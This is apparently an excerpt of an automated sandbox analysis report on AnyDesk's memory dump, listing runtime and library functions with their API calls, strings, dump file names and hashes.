                                                                                                                                                                                                                                                  • \StringFileInfo\%02X%02X%02X%02X\CompanyName, xrefs: 69C5F286
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileInfoQueryValueVersion$Size
                                                                                                                                                                                                                                                  • String ID: \StringFileInfo\%02X%02X%02X%02X\CompanyName$\VarFileInfo\Translation
                                                                                                                                                                                                                                                  • API String ID: 2099394744-937506062
                                                                                                                                                                                                                                                  • Opcode ID: 1da150b9443c94917f10a65aceffcfed5bc4f0d6300ae5d83629c84da95cbbbb
                                                                                                                                                                                                                                                  • Instruction ID: e650abd6ee291f6126e56e65f2ec9c6e3788387ac67083bea4a9679ec3b0b997
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1da150b9443c94917f10a65aceffcfed5bc4f0d6300ae5d83629c84da95cbbbb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA3186F9A002286BEB24DA55EC41EDF77FCAB44200FD045D6FA25D3142EA309A64DB68
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C43327 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,?,?,?,?,?,?,69C7B5AC,19930522,00000000,1FFFFFFF), ref: 69C4334E
                                                                                                                                                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 69C43381
                                                                                                                                                                                                                                                  • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 69C433AA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CallCheckEncodePointerRangeTranslatorTrys
                                                                                                                                                                                                                                                  • String ID: MOC$RCC$U"
                                                                                                                                                                                                                                                  • API String ID: 877623402-3732758283
                                                                                                                                                                                                                                                  • Opcode ID: e67bbc61ef93d82a854acc5daf3d24b6e12e797a9617a8a47d3ccae3ae15dedc
                                                                                                                                                                                                                                                  • Instruction ID: 66d05c86cfe2e0c1addd58ecb57f3ac9479bc6a79e63127256afd1bbad1f08db
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e67bbc61ef93d82a854acc5daf3d24b6e12e797a9617a8a47d3ccae3ae15dedc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE416B32600149EFDF02CF40D981EAEBB76FF88B14F259548E91467251E775ED51CBA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C6411C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?), ref: 69C64149
                                                                                                                                                                                                                                                  • LockFileEx.KERNEL32(00000000,00000002,00000000,000000FF,000000FF,?), ref: 69C6417F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C64198
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C641D9
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C641A5
                                                                                                                                                                                                                                                  • LockFileEx, xrefs: 69C641B8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$CreateErrorLastLock
                                                                                                                                                                                                                                                  • String ID: LockFileEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3875127904-1259685872
                                                                                                                                                                                                                                                  • Opcode ID: 557f46b00c23b8fd46f4f42f50a0d279b0caed766ed07457d56dd0132aac2a5d
                                                                                                                                                                                                                                                  • Instruction ID: 61e94eec65d073cb7a9c58d0175f35f4bf54b28b351ac968d82b557cf3d25b51
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 557f46b00c23b8fd46f4f42f50a0d279b0caed766ed07457d56dd0132aac2a5d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D931F535604314BFD720CFB8ECA1B9AB7E8BF05B24F104229F655EB2D1E73099008B90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C27950 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Getcvt
                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                  • API String ID: 1921796781-2658103896
                                                                                                                                                                                                                                                  • Opcode ID: 9c0830689b706f0b3eb7845bf9c81c4d2c8e6637f80644203ca52c0f1ec7158c
                                                                                                                                                                                                                                                  • Instruction ID: 87d1dc6177375cfc987d60925de29a678fa0c600c0c41e2c05fe85d322dcc190
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c0830689b706f0b3eb7845bf9c81c4d2c8e6637f80644203ca52c0f1ec7158c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77319C359042549FEB10DF68A480BABBFB4AF46314F08C49ED8844F345E3B2EA008BA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C273E0 Relevance: 10.6, APIs: 7, Instructions: 87COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C273EE
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C2740A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C2742A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C27471
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 69C274AD
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C274B8
                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 69C274C6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 954195503-0
                                                                                                                                                                                                                                                  • Opcode ID: ab6445e6cd6f571172689014814f00add7f5941d69e5285c5dc83a26c68974f5
                                                                                                                                                                                                                                                  • Instruction ID: d8eb710033e2e66986bf49e9f55db171ad1939604352e430942685fd8af823c6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab6445e6cd6f571172689014814f00add7f5941d69e5285c5dc83a26c68974f5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D31AE369012249FCB11DF58E98099DBBB4EF45324F5495A9D8099B211FB30BE02EFE2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3E580 Relevance: 10.6, APIs: 7, Instructions: 87COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C3E58E
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C3E5AA
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C3E5CA
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C3E611
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 69C3E64D
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C3E658
                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 69C3E666
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 954195503-0
                                                                                                                                                                                                                                                  • Opcode ID: 7800627c8903baa6e885248ff2c53119424326048821349a4074ae294c5d87a3
                                                                                                                                                                                                                                                  • Instruction ID: 679c7ab89cddb71fb08b0e716e7f003569b4545f5afd3601a41d87b9b9a6562a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7800627c8903baa6e885248ff2c53119424326048821349a4074ae294c5d87a3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B31D1369051389FCB11DF58F6809ADBBB4EF46328B91C5A9D80597211FB31AE02CFC2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C274E0 Relevance: 10.6, APIs: 7, Instructions: 87COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C274EE
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C2750A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C2752A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C27571
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 69C275AD
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C275B8
                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 69C275C6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 954195503-0
                                                                                                                                                                                                                                                  • Opcode ID: fa4819c9de607170d0315f9353097616a5e604aa3d1b31cc308fd850d747134c
                                                                                                                                                                                                                                                  • Instruction ID: 47643043a42ad37ad81f5fd7dfc4acce2ab073cb1433feb4e35f195457fc17c8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa4819c9de607170d0315f9353097616a5e604aa3d1b31cc308fd850d747134c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C31BD369052249FCB11DF58EAC099DF7B4EF45324B5085BAD8099B210FB30BA02EFD2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5A2AB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C59FF2: _free.LIBCMT ref: 69C5A01B
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A2F9
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A304
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A30F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A363
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A36E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A379
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A384
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: 9f76696241dda59e37702b6c7b8591e1945ed59e411e7bea7a02caf6cd15d4c2
                                                                                                                                                                                                                                                  • Instruction ID: bbf3d7dfedac22545cea4b3f27f556526725cf84f13bd6be87c7b585d99802bc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f76696241dda59e37702b6c7b8591e1945ed59e411e7bea7a02caf6cd15d4c2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09117FB5641F14AAEA21EBB0EC45FCBB79C6F00704F80DD54E69B660A0FB25B52AC750
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C455A6 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000001,?,69C4548D,69C40D47,69C4093D,?,69C40B4D,?,00000001,?,?,00000001,?,69C7B430,0000000C,69C40C56), ref: 69C455B4
                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 69C455C2
                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 69C455DB
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,69C40B4D,?,00000001,?,?,00000001,?,69C7B430,0000000C,69C40C56,?,00000001,?), ref: 69C4562D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                  • Opcode ID: 59cf13e51ff526468d27c08a2d8bbe3a424531f477bbb9798a3ad586413d8cc7
                                                                                                                                                                                                                                                  • Instruction ID: a01de59609c476c16ee87e054c6375e5bd39c4d3a5ad9a271b5587fab8d15f33
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59cf13e51ff526468d27c08a2d8bbe3a424531f477bbb9798a3ad586413d8cc7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C01B17670D3E16EEB016AB57D86A9A3B65FB42F78F20122BF824D82D0FF514803D181
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3F0D2 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                                                                  • API String ID: 0-1718035505
                                                                                                                                                                                                                                                  • Opcode ID: ae8cf25966f4fe63fed5136ca39f4c12619991e52fbe5d9e13a8a25ca904f668
                                                                                                                                                                                                                                                  • Instruction ID: 0c79312a618f57ae909908038f37833b69b63261c39f3af7d2ae323cd401a539
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae8cf25966f4fe63fed5136ca39f4c12619991e52fbe5d9e13a8a25ca904f668
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 940128712462726FBF101D79BDC459737B86A873653D00D3AE962D7200FB12C006B2A1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C461B6 Relevance: 9.3, APIs: 6, Instructions: 264COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 69C46343
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 69C4635F
                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 69C46376
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 69C46394
                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 69C463AB
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 69C463C9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1992179935-0
                                                                                                                                                                                                                                                  • Opcode ID: eb28e984e25da9783835f8272df4ce7e389c0037cec3ff910c796465c90b5c8c
                                                                                                                                                                                                                                                  • Instruction ID: 3c2233fe5ca28e1cd76dd2eb7fec6bdb5056ef203f6c13a95d8c46dbc47f5b6e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb28e984e25da9783835f8272df4ce7e389c0037cec3ff910c796465c90b5c8c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6812775B00F0AABE324CE68EE80B5A73F9EF45B68F10853AE511D7685FB70D9508B50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C54D05 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
